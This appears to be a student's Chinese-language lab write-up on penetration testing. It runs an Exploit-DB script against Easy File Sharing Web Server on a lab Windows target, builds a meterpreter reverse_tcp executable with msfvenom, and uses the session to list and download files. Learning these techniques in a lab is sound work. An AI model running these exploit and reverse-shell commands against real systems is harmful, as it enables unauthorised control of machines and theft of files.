一、漏洞渗透测试
1、靶机安装easy file sharing web server(efssetup_2018.zip)
2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100
3、利用该漏洞,使得靶机运行计算器。P116-119
具体实现
1.靶机安装efssetup
2、使用nmap扫描靶机,发现在8080端口有Easy File Sharing 服务
nmap -sV ip(扫描服务版本)
3、查找EasyFileSharing的有关漏洞
4、随机执行其中的一个漏洞脚本、就可以看到靶机已打开计算机
python /usr/share/exploitdb/exploits/windows/remote/39009.py 172.16.91.4 8080脚本
就可以看到靶机的计算器被打开了
二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
具体实现过程:
1、生成被控端
命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /root/payload.exe
msfvenom:Metasploit程序内置的远程控制命令。
-p:指定要生成的payload,即攻击荷载。
windows:适用于Windows系统的。
meterpreter:采用meterpreter主控的。
reverse_tcp lhost:指定接收端host的ip。
lport:指定端口。
-f:指定格式为exe。
-o:指定存储payload位置,即/root/下。
2、在kali运行被控端,获得目标计算机的控制权
3、对靶机进行操作,查看文件并且下载
Ls:查看文件
Download 文件名 :下载文件